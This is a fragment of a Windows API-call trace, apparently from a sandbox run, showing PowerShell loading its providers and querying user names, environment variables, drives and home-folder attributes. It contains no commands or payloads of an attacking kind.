[0080.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.798] CoTaskMemAlloc (cb=0x804) returned 0x1b7928d0
[0080.798] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7928d0, nSize=0x10d1a8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x10d1a8) returned 0x1
[0080.798] CoTaskMemFree (pv=0x1b7928d0)
[0080.798] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.798] GetUserNameW (in: lpBuffer=0x1c3c90, pcbBuffer=0x10d1e8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x10d1e8) returned 1
[0080.799] CoTaskMemFree (pv=0x1c3c90)
[0080.799] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c37d08*="Environment", lpRawData=0x3c37a98) returned 1
[0080.803] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0080.803] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.803] CoTaskMemFree (pv=0x229ec0)
[0080.804] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0080.804] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
[0080.804] CoTaskMemFree (pv=0x229ec0)
[0080.804] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0080.804] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
[0080.804] CoTaskMemFree (pv=0x229ec0)
[0080.804] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x10cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0080.804] SetErrorMode (uMode=0x1) returned 0x1
[0080.804] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x10cf60 | out: lpFileInformation=0x10cf60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0080.804] SetErrorMode (uMode=0x1) returned 0x1
[0080.823] GetLogicalDrives () returned 0x4
[0080.829] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10cac0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.830] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0080.830] SetErrorMode (uMode=0x1) returned 0x1
[0080.831] CoTaskMemAlloc (cb=0x68) returned 0x24d360
[0080.831] CoTaskMemAlloc (cb=0x68) returned 0x24d3d0
[0080.831] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24d360, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x10cf30, lpMaximumComponentLength=0x10cf2c, lpFileSystemFlags=0x10cf28, lpFileSystemNameBuffer=0x24d3d0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x10cf30*=0x705ba84c, lpMaximumComponentLength=0x10cf2c*=0xff, lpFileSystemFlags=0x10cf28*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
[0080.831] CoTaskMemFree (pv=0x24d360)
[0080.831] CoTaskMemFree (pv=0x24d3d0)
[0080.831] SetErrorMode (uMode=0x1) returned 0x1
[0080.831] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0080.831] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10cc70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.831] SetErrorMode (uMode=0x1) returned 0x1
[0080.831] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10ced0 | out: lpFileInformation=0x10ced0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x5492b1a0, ftLastAccessTime.dwHighDateTime=0x1d34750, ftLastWriteTime.dwLowDateTime=0x5492b1a0, ftLastWriteTime.dwHighDateTime=0x1d34750, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0080.832] SetErrorMode (uMode=0x1) returned 0x1
[0080.832] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10cc70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.832] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10cb20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.832] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0080.832] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10ca50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.832] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0080.832] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10caa0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.832] SetErrorMode (uMode=0x1) returned 0x1
[0080.832] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10cd00 | out: lpFileInformation=0x10cd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x5492b1a0, ftLastAccessTime.dwHighDateTime=0x1d34750, ftLastWriteTime.dwLowDateTime=0x5492b1a0, ftLastWriteTime.dwHighDateTime=0x1d34750, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0080.832] SetErrorMode (uMode=0x1) returned 0x1
[0080.832] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10caa0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.832] SetErrorMode (uMode=0x1) returned 0x1
[0080.832] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10cd00 | out: lpFileInformation=0x10cd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x5492b1a0, ftLastAccessTime.dwHighDateTime=0x1d34750, ftLastWriteTime.dwLowDateTime=0x5492b1a0, ftLastWriteTime.dwHighDateTime=0x1d34750, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0080.833] SetErrorMode (uMode=0x1) returned 0x1
[0080.833] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10cb40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.833] SetErrorMode (uMode=0x1) returned 0x1
[0080.833] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10cda0 | out: lpFileInformation=0x10cda0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x5492b1a0, ftLastAccessTime.dwHighDateTime=0x1d34750, ftLastWriteTime.dwLowDateTime=0x5492b1a0, ftLastWriteTime.dwHighDateTime=0x1d34750, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0080.833] SetErrorMode (uMode=0x1) returned 0x1
[0080.833] CoTaskMemAlloc (cb=0x804) returned 0x1b7928d0
[0080.833] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7928d0, nSize=0x10d1a8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x10d1a8) returned 0x1
[0080.837] CoTaskMemFree (pv=0x1b7928d0)
[0080.837] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.837] GetUserNameW (in: lpBuffer=0x1c3c90, pcbBuffer=0x10d1e8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x10d1e8) returned 1
[0080.837] CoTaskMemFree (pv=0x1c3c90)
[0080.837] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c3ed60*="FileSystem", lpRawData=0x3c3eaf0) returned 1
[0080.839] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0080.839] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.839] CoTaskMemFree (pv=0x229ec0)
[0080.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.840] CoTaskMemAlloc (cb=0x804) returned 0x1b7928d0
[0080.840] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7928d0, nSize=0x10d1a8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x10d1a8) returned 0x1
[0080.840] CoTaskMemFree (pv=0x1b7928d0)
[0080.840] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.840] GetUserNameW (in: lpBuffer=0x1c3c90, pcbBuffer=0x10d1e8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x10d1e8) returned 1
[0080.840] CoTaskMemFree (pv=0x1c3c90)
[0080.840] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c44550*="Function", lpRawData=0x3c442e0) returned 1
[0080.844] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0080.844] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.844] CoTaskMemFree (pv=0x229ec0)
[0080.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.975] CoTaskMemAlloc (cb=0x804) returned 0x1b7928d0
[0080.975] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7928d0, nSize=0x10d1a8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x10d1a8) returned 0x1
[0080.975] CoTaskMemFree (pv=0x1b7928d0)
[0080.975] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.975] GetUserNameW (in: lpBuffer=0x1c3c90, pcbBuffer=0x10d1e8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x10d1e8) returned 1
[0080.975] CoTaskMemFree (pv=0x1c3c90)
[0080.975] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2da7760*="Registry", lpRawData=0x2da74f0) returned 1
[0080.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.981] CoTaskMemAlloc (cb=0x804) returned 0x1b7928d0
[0080.981] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7928d0, nSize=0x10d1a8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x10d1a8) returned 0x1
[0080.981] CoTaskMemFree (pv=0x1b7928d0)
[0080.981] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.981] GetUserNameW (in: lpBuffer=0x1c3c90, pcbBuffer=0x10d1e8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x10d1e8) returned 1
[0080.981] CoTaskMemFree (pv=0x1c3c90)
[0080.982] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dacb28*="Variable", lpRawData=0x2dac8b8) returned 1
[0080.984] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0080.984] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.985] CoTaskMemFree (pv=0x229ec0)
[0081.014] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0081.014] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.014] CoTaskMemFree (pv=0x229ec0)
[0081.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
[0081.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
[0081.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
[0081.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
[0081.072] CoTaskMemAlloc (cb=0x804) returned 0x1b79db40
[0081.073] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b79db40, nSize=0x10d1a8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x10d1a8) returned 0x1
[0081.095] CoTaskMemFree (pv=0x1b79db40)
[0081.095] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0081.095] GetUserNameW (in: lpBuffer=0x1c3c90, pcbBuffer=0x10d1e8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x10d1e8) returned 1
[0081.096] CoTaskMemFree (pv=0x1c3c90)
[0081.096] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dc0c60*="Certificate", lpRawData=0x2dc09f0) returned 1
[0081.139] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0081.139] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.139] CoTaskMemFree (pv=0x229ec0)
[0081.141] GetLogicalDrives () returned 0x4
[0081.141] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10ce30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0081.141] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0081.142] CoTaskMemAlloc (cb=0x20e) returned 0x23f8b0
[0081.142] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x23f8b0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19
[0081.142] CoTaskMemFree (pv=0x23f8b0)
[0081.142] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0081.142] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.142] CoTaskMemFree (pv=0x229ec0)
[0081.142] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0081.142] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.142] CoTaskMemFree (pv=0x229ec0)
[0081.146] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0081.146] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.146] CoTaskMemFree (pv=0x229ec0)
[0081.147] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0081.147] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.147] CoTaskMemFree (pv=0x229ec0)
[0081.147] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x10cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.147] SetErrorMode (uMode=0x1) returned 0x1
[0081.147] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x10cdf0 | out: lpFileInformation=0x10cdf0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xd5210210, ftLastAccessTime.dwHighDateTime=0x1d34cee, ftLastWriteTime.dwLowDateTime=0xd5210210, ftLastWriteTime.dwHighDateTime=0x1d34cee, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.147] SetErrorMode (uMode=0x1) returned 0x1
[0081.147] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x10cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.147] SetErrorMode (uMode=0x1) returned 0x1
[0081.147] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x10cdf0 | out: lpFileInformation=0x10cdf0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xd5210210, ftLastAccessTime.dwHighDateTime=0x1d34cee, ftLastWriteTime.dwLowDateTime=0xd5210210, ftLastWriteTime.dwHighDateTime=0x1d34cee, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.147] SetErrorMode (uMode=0x1) returned 0x1
[0081.148] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0081.148] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.148] CoTaskMemFree (pv=0x229ec0)
[0081.149] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x10cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.149] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10cba0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0081.149] SetErrorMode (uMode=0x1) returned 0x1
[0081.149] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10cdb0 | out: lpFileInformation=0x10cdb0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x5492b1a0, ftLastAccessTime.dwHighDateTime=0x1d34750, ftLastWriteTime.dwLowDateTime=0x5492b1a0, ftLastWriteTime.dwHighDateTime=0x1d34750, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.149] SetErrorMode (uMode=0x1) returned 0x1
[0081.149] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10cba0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0081.150] SetErrorMode (uMode=0x1) returned 0x1
[0081.150] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10cdb0 | out: lpFileInformation=0x10cdb0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x5492b1a0, ftLastAccessTime.dwHighDateTime=0x1d34750, ftLastWriteTime.dwLowDateTime=0x5492b1a0, ftLastWriteTime.dwHighDateTime=0x1d34750, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.150] SetErrorMode (uMode=0x1) returned 0x1
[0081.150] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0081.150] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10caa0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0081.150] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x10cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
[0081.150] SetErrorMode (uMode=0x1) returned 0x1
[0081.150] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x10cdb0 | out: lpFileInformation=0x10cdb0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0081.150] SetErrorMode (uMode=0x1) returned 0x1
[0081.150] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x10cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
